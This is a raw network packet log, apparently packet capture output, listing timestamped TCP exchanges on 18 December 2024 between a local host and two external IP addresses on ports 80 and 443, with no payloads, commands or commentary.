                                                                                                                                                                  Dec 18, 2024 11:09:23.764837980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:23.947261095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:24.917442083 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:24.917553902 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:24.919158936 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:24.919171095 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:24.919415951 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:24.961035967 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:24.961062908 CET49913443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:24.961112976 CET44349913104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.083770037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.083823919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.083833933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.083852053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.083863974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.083890915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.083890915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.083986998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.083998919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.084019899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.084019899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.084153891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.084165096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.084176064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.084184885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.084184885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.084767103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.203737020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.203790903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.204129934 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.207803011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.207835913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.208142042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.274967909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.275141001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.275353909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.279122114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.279251099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.281501055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.287560940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.287589073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.287631989 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.291482925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.295835972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.295885086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.295948029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.299494982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.304297924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.304352999 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.304404020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.307487965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.312627077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.312678099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.312716961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.315402031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.321002960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.321053028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.321108103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.321564913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.329402924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.329472065 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.329513073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.330820084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.337833881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.337878942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.337918043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.337918043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.345535040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.345644951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.345663071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.351197004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.353208065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.353286028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.353298903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.353490114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.361001968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.361115932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.361160040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.466238022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.466320992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.466331005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.466418028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.468590021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.468619108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.468636990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.469434977 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.473299980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.473351002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.473361015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.473401070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.478049994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.478101015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.478142023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.478216887 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.482676983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.482734919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.482790947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.482837915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.487333059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.487423897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.487463951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.487463951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.491940975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.492033958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.492043018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.492079973 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.496402979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.496529102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.496536016 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.496567965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.501574039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.501591921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.501619101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.501780987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.507383108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.507407904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.507432938 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.507447958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.510422945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.510469913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.510591984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.510631084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.514951944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.515062094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.515124083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.515319109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.519557953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.519615889 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.519725084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.519798994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.523751974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.523916960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.524080992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.524122953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.528265953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.528415918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.528450012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.528492928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.532987118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.533001900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.533055067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.533055067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.536601067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.536655903 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.536696911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.537018061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.541074991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.541132927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.541232109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.541274071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.545497894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.545665026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.545706034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.545706034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.549957991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.550009966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.550041914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.550189018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.554429054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.554513931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.657633066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.657730103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.657741070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.657790899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.659368992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.659476995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.659503937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.659805059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.663053036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.663115978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.663119078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.666543961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.666573048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.666621923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.666660070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.666660070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.670164108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.670207024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.670243979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.670367956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.673702955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.673746109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.673813105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.673857927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.677196980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.677237988 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.677303076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.677339077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.680464983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.680511951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.680619001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.680655956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.683698893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.683737040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.683810949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.683849096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.687104940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.687151909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.687199116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.687232971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.690896034 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.690943956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.691004038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.691046000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.694390059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.694412947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.694441080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.694464922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.696894884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.696942091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.696964979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.697007895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.700268030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.700313091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.700372934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.700417042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.703545094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.703679085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.703722954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.706871986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.706919909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.706918001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.707190037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.710118055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.710167885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.710225105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.710268021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.713449955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.713471889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.713510990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.713531017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.716743946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.716798067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.716813087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.716856003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.720093966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.720135927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.720172882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.720215082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.723321915 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.723370075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.723416090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.723454952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.726641893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.726700068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.726737976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.726775885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.729999065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.730057001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.730081081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.730135918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.733266115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.733314037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.733470917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.733513117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.736614943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.736668110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.736710072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.736756086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.740029097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.740087986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.740118980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.740159035 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.743287086 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.743299007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.743346930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.746467113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.746534109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.746570110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.746629000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.749789000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.749838114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.749871969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.749917984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.753207922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.753293037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.753348112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.756493092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.756695986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.756752968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.759751081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.759865046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.759917974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.848563910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.848615885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.848663092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.848706007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.849911928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.849960089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.849987984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.850032091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.852662086 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.852704048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.852710962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.852755070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.856153011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.856204987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.856281996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.856334925 CET4991280192.168.2.631.41.244.11
